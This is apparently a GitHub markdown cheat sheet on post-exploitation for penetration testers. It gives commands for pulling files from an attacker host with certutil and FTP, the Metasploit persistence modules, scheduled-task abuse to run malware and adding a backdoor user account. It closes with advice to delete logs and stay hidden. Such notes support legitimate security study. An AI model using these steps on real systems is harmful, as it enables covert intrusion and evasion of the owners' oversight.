description
You landed yourself on a box, now what?

Post Exploitation

File Transfers Review

Certutil (Windows)

certutil.exe -urlcache -f http://kali_ip/file.txt file.txt

HTTP Server

python3 -m http.server <port>

Browser

Navigate directly to the file

FTP

Kali: python -m pyftpdlib 21

Windows or Linux: ftp kali_ip

Additional Linux Exclusives

Upon hosting an HTTP server, an attacker could utilize wget and curl to remotely grab a file

Maintaining Access

Persistence Scripts

Run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence

These Metasploit scripts are very dangerous as they tend to open up ports.

Simply remember that open ports have no authentication mechanism.

Scheduled Tasks

Run scheduleme
Run schtaskabuse

Instead consider running malware on by scheduling tasks.

Add a user

net user hacker password123 /add

Cleaning up

This is from a pentest perspective
The goal is to leave the network exactly as you left it
Remove executables, scripts, and added files
Remove malware, rootkits, and added user accounts
Set settings back to original configurations

Red Team Perspective

Delete your logs
You need to be a ghost
Exist in the shadows

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

post-exploitation.md

post-exploitation.md

Post Exploitation

File Transfers Review

Certutil (Windows)

HTTP Server

Browser

FTP

Additional Linux Exclusives

Maintaining Access

Persistence Scripts

Scheduled Tasks

Add a user

Cleaning up

Red Team Perspective

Files

post-exploitation.md

Latest commit

History

post-exploitation.md

File metadata and controls

Post Exploitation

File Transfers Review

Certutil (Windows)

HTTP Server

Browser

FTP

Additional Linux Exclusives

Maintaining Access

Persistence Scripts

Scheduled Tasks

Add a user

Cleaning up

Red Team Perspective